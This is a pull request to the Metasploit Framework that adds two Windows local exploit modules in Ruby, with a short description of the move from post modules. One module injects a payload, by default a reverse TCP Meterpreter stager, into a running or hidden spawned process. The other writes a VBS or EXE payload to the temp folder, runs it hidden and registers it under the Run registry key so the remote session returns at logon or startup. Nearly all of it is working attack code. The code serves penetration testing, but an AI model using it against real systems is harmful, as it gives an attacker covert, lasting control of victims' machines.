### PR TITLE
Migrations of Persistence and Payload Inject to Exploit Local

### DIFF
--- a/modules/exploits/windows/local/payload_inject.rb
+++ b/modules/exploits/windows/local/payload_inject.rb
@@ -1,0 +1,128 @@
+##
+# ## This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'rex'
+require 'msf/core/exploit/exe'
+
+class Metasploit3 < Msf::Exploit::Local
+	Rank = ExcellentRanking
+
+	def initialize(info={})
+		super( update_info( info,
+			'Name'          => 'Windows Manage Memory Payload Injection Module',
+			'Description'   => %q{
+				This module will inject into the memory of a process a specified windows payload.
+				If a payload or process is not provided one will be created by default
+				using a reverse x86 TCP Meterpreter Payload.
+			},
+			'License'       => MSF_LICENSE,
+			'Author'        =>
+				[
+					'Carlos Perez <carlos_perez[at]darkoperator.com>'
+				],
+			'Version'       => '',
+			'Platform'      => [ 'win' ],
+			'SessionTypes'  => [ 'meterpreter' ],
+			'Targets'       => [ [ 'Windows', {} ] ],
+			'DefaultTarget' => 0,
+			'DisclosureDate'=> "Oct 12 2011"
+		))
+
+		register_options(
+			[
+				OptInt.new('PID',
+					[false, 'Process Identifier to inject of process to inject payload.'])
+			], self.class)
+	end
+
+	# Run Method for when run command is issued
+	def exploit
+		# syinfo is only on meterpreter sessions
+		print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil?
+
+		pid = datastore['PID']
+
+		if pid == 0
+			pid = create_temp_proc()
+		end
+
+		if payload.send(:pinst).arch.first =~ /64/ and client.platform =~ /x86/
+			print_error("You are trying to inject to a x64 process from a x86 version of Meterpreter.")
+			print_error("Migrate to an x64 process and try again.")
+			return false
+		else
+			inject_into_pid(pid,datastore['NEWPROCESS'])
+		end
+	end
+
+	# Checks the Architeture of a Payload and PID are compatible
+	# Returns true if they are false if they are not
+	def arch_check(pid)
+		# get the pid arch
+		client.sys.process.processes.each do |p|
+			# Check Payload Arch
+			if pid == p["pid"]
+				print_status("Process found checking Architecture")
+				if payload.send(:pinst).arch.first == p['arch']
+					print_good("Process is the same architecture as the payload")
+					return true
+				else
+					print_error("The PID #{ p['arch']} and Payload #{payload.send(:pinst).arch.first} architectures are different.")
+					return false
+				end
+			end
+		end
+	end
+
+	# Creates a temp notepad.exe to inject payload in to given the payload
+	# Returns process PID
+	def create_temp_proc()
+		windir = client.fs.file.expand_path("%windir%")
+		# Select path of executable to run depending the architecture
+		if payload.send(:pinst).arch.first== "x86" and client.platform =~ /x86/
+			cmd = "#{windir}\\System32\\notepad.exe"
+		elsif payload.send(:pinst).arch.first == "x86_64" and client.platform =~ /x64/
+			cmd = "#{windir}\\System32\\notepad.exe"
+		elsif payload.send(:pinst).arch.first == "x86_64" and client.platform =~ /x86/
+			cmd = "#{windir}\\Sysnative\\notepad.exe"
+		elsif payload.send(:pinst).arch.first == "x86" and client.platform =~ /x64/
+			cmd = "#{windir}\\SysWOW64\\notepad.exe"
+		end
+		# run hidden
+		proc = client.sys.process.execute(cmd, nil, {'Hidden' => true })
+		return proc.pid
+	end
+
+	def inject_into_pid(pid,newproc)
+		print_status("Performing Architecture Check")
+		# If architecture check fails and a new process is wished to inject to one with the proper arch
+		# will be created
+		if arch_check(pid)
+			pid = create_temp_proc() if newproc
+			print_status("Injecting #{payload.send(:pinst).name} into process ID #{pid}")
+			begin
+				print_status("Opening process #{pid}")
+				host_process = client.sys.process.open(pid.to_i, PROCESS_ALL_ACCESS)
+				print_status("Generating payload")
+				raw = payload.generate
+				print_status("Allocating memory in procees #{pid}")
+				mem = host_process.memory.allocate(raw.length + (raw.length % 1024))
+				# Ensure memory is set for execution
+				host_process.memory.protect(mem)
+				print_status("Allocated memory at address #{"0x%.8x" % mem}, for #{raw.length} byte stager")
+				print_status("Writing the stager into memory...")
+				host_process.memory.write(mem, raw)
+				host_process.thread.create(mem, 0)
+				print_good("Successfully injected payload in to process: #{pid}")
+			rescue ::Exception => e
+				print_error("Failed to Inject Payload to #{pid}!")
+				print_error(e.to_s)
+			end
+		end
+	end
+end

--- a/modules/exploits/windows/local/payload_inject.rb
+++ b/modules/exploits/windows/local/payload_inject.rb
@@ -25,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Local
 				[
 					'Carlos Perez <carlos_perez[at]darkoperator.com>'
 				],
-			'Version'       => '',
 			'Platform'      => [ 'win' ],
 			'SessionTypes'  => [ 'meterpreter' ],
 			'Targets'       => [ [ 'Windows', {} ] ],

--- a/modules/exploits/windows/local/persistence.rb
+++ b/modules/exploits/windows/local/persistence.rb
@@ -1,0 +1,215 @@
+##
+# ## This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'rex'
+require 'msf/core/post/common'
+require 'msf/core/post/file'
+require 'msf/core/post/windows/priv'
+require 'msf/core/post/windows/registry'
+require 'msf/core/exploit/exe'
+
+class Metasploit3 < Msf::Exploit::Local
+	Rank = ExcellentRanking
+
+	include Msf::Post::Common
+	include Msf::Post::File
+	include Msf::Post::Windows::Priv
+	include Msf::Post::Windows::Registry
+	include Exploit::EXE
+
+	def initialize(info={})
+		super( update_info( info,
+			'Name'          => 'Windows Manage Persistent Payload Installer',
+			'Description'   => %q{
+				This Module will create a boot persistent reverse Meterpreter session by
+				installing on the target host the payload as a script that will be executed
+				at user logon or system startup depending on privilege and selected startup
+				method.
+
+				REXE mode will transfer a binary of your choosing to remote host to be
+				used as a payload.
+			},
+			'License'       => MSF_LICENSE,
+			'Author'        =>
+				[
+					'Carlos Perez <carlos_perez[at]darkoperator.com>'
+				],
+			'Version'       => '',
+			'Platform'      => [ 'win' ],
+			'SessionTypes'  => [ 'meterpreter' ],
+			'Targets'       => [ [ 'Windows', {} ] ],
+			'DefaultTarget' => 0,
+			'DisclosureDate'=> "Oct 19 2011"
+		))
+
+		register_options(
+			[
+				OptInt.new('DELAY', [true, 'Delay in seconds for persistent payload to reconnect.', 5]),
+				OptEnum.new('STARTUP', [true, 'Startup type for the persistent payload.', 'USER', ['USER','SYSTEM']]),
+				OptString.new('REXENAME',[false, 'The name to call payload on remote system.','']),
+				OptString.new('REG_NAME',[false, 'The name to call registry value for persistence on remote system','']),
+			], self.class)
+
+	end
+
+	# Run Method for when run command is issued
+	#-------------------------------------------------------------------------------
+	def exploit
+		print_status("Running module against #{sysinfo['Computer']}")
+
+		rexe = datastore['EXE::Custom']
+		rexename = datastore['REXENAME']
+		delay = datastore['DELAY']
+		reg_val = datastore['REG_NAME']
+		template_pe = datastore['EXE::Template']
+		@clean_up_rc = ""
+		host,port = session.session_host, session.session_port
+
+		if rexe.nil?
+			script = create_script(delay, template_pe)
+			script_on_target = write_script_to_target(script,rexename)
+		else
+			alt_pay_exe = get_custom_exe
+			script_on_target = write_exe_to_target(alt_pay_exe, rexename)
+		end
+
+		# Initial execution of script
+		target_exec(script_on_target)
+
+		case datastore['STARTUP']
+		when /USER/i
+			write_to_reg("HKCU", script_on_target, reg_val)
+		when /SYSTEM/i
+			write_to_reg("HKLM", script_on_target, reg_val)
+		end
+
+		clean_rc = log_file()
+		file_local_write(clean_rc,@clean_up_rc)
+		print_status("Cleanup Meterpreter RC File: #{clean_rc}")
+
+		report_note(:host => host,
+			:type => "host.persistance.cleanup",
+			:data => {
+				:local_id => session.sid,
+				:stype => session.type,
+				:desc => session.info,
+				:platform => session.platform,
+				:via_payload => session.via_payload,
+				:via_exploit => session.via_exploit,
+				:created_at => Time.now.utc,
+				:commands =>  @clean_up_rc
+			}
+		)
+	end
+
+	# Function for Creating persistent script
+	#-------------------------------------------------------------------------------
+	def create_script(delay, altexe)
+		if not altexe.nil?
+			vbs = ::Msf::Util::EXE.to_win32pe_vbs(session.framework, payload.raw, {:persist => true, :delay => delay, :template => altexe})
+		else
+			vbs = ::Msf::Util::EXE.to_win32pe_vbs(session.framework, payload.raw, {:persist => true, :delay => delay})
+		end
+		print_status("Persistent agent script is #{vbs.length} bytes long")
+		return vbs
+	end
+
+	# Function for creating log folder and returning log path
+	#-------------------------------------------------------------------------------
+	def log_file(log_path = nil)
+		#Get hostname
+		host = session.sys.config.sysinfo["Computer"]
+
+		# Create Filename info to be appended to downloaded files
+		filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")
+
+		# Create a directory for the logs
+		if log_path
+			logs = ::File.join(log_path, 'logs', 'persistence', Rex::FileUtils.clean_path(host + filenameinfo) )
+		else
+			logs = ::File.join(Msf::Config.log_directory, 'persistence', Rex::FileUtils.clean_path(host + filenameinfo) )
+		end
+
+		# Create the log directory
+		::FileUtils.mkdir_p(logs)
+
+		#logfile name
+		logfile = logs + ::File::Separator + Rex::FileUtils.clean_path(host + filenameinfo) + ".rc"
+		return logfile
+	end
+
+	# Function for writing script to target host
+	#-------------------------------------------------------------------------------
+	def write_script_to_target(vbs,name)
+		tempdir = session.fs.file.expand_path("%TEMP%")
+		if name.nil?
+			tempvbs = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".vbs"
+		else
+			tempvbs = tempdir + "\\" + name + ".vbs"
+		end
+		fd = session.fs.file.new(tempvbs, "wb")
+		fd.write(vbs)
+		fd.close
+		print_good("Persistent Script written to #{tempvbs}")
+		@clean_up_rc << "rm #{tempvbs}\n"
+		return tempvbs
+	end
+
+	# Function to execute script on target and return the PID of the process
+	#-------------------------------------------------------------------------------
+	def target_exec(script_on_target)
+		print_status("Executing script #{script_on_target}")
+		if datastore['EXE::Custom'].nil?
+			proc = session.sys.process.execute(script_on_target, nil, {'Hidden' => true})
+		else
+			proc = session.sys.process.execute("cscript \"#{script_on_target}\"", nil, {'Hidden' => true})
+		end
+
+		print_good("Agent executed with PID #{proc.pid}")
+		@clean_up_rc << "kill #{proc.pid}\n"
+		return proc.pid
+	end
+
+	# Function to install payload in to the registry HKLM or HKCU
+	#-------------------------------------------------------------------------------
+	def write_to_reg(key,script_on_target, registry_value)
+		if registry_value.nil?
+			nam = Rex::Text.rand_text_alpha(rand(8)+8)
+		else
+			nam = registry_value
+		end
+
+		print_status("Installing into autorun as #{key}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\#{nam}")
+
+		if(key)
+			registry_setvaldata("#{key}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",nam,script_on_target,"REG_SZ")
+			print_good("Installed into autorun as #{key}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\#{nam}")
+		else
+			print_error("Error: failed to open the registry key for writing")
+		end
+	end
+
+	# Function for writing executable to target host
+	#-------------------------------------------------------------------------------
+	def write_exe_to_target(exe_raw, rexename)
+		if rexename.nil?
+			exe_name = Rex::Text.rand_text_alpha(rand(8)+8)
+		else
+			exe_name = rexename
+		end
+
+		tempdir = session.fs.file.expand_path("%TEMP%")
+		tempexe = tempdir + "\\" + exe_name + ".exe"
+		fd = session.fs.file.new(tempexe, "wb")
+		fd.write(exe_raw)
+		fd.close
+		print_good("Persistent Script written to #{tempexe}")
+		@clean_up_rc << "rm #{tempexe}\n"
+		return tempexe
+	end
+end

--- a/modules/exploits/windows/local/persistence.rb
+++ b/modules/exploits/windows/local/persistence.rb
@@ -39,7 +39,6 @@ class Metasploit3 < Msf::Exploit::Local
 				[
 					'Carlos Perez <carlos_perez[at]darkoperator.com>'
 				],
-			'Version'       => '',
 			'Platform'      => [ 'win' ],
 			'SessionTypes'  => [ 'meterpreter' ],
 			'Targets'       => [ [ 'Windows', {} ] ],


### PR DESCRIPTION
- Migration of Persistence post module to local exploit.
- Migration of Payload_Inject post module to local exploit.
- Removed the $Id$ and $Revision$ keywords as recommended by TodB

Migration of post modules as requested by Egypt to local exploit. 
Any post module that uses a payload should be a local exploit so ato provide greater flexibility for payload management.
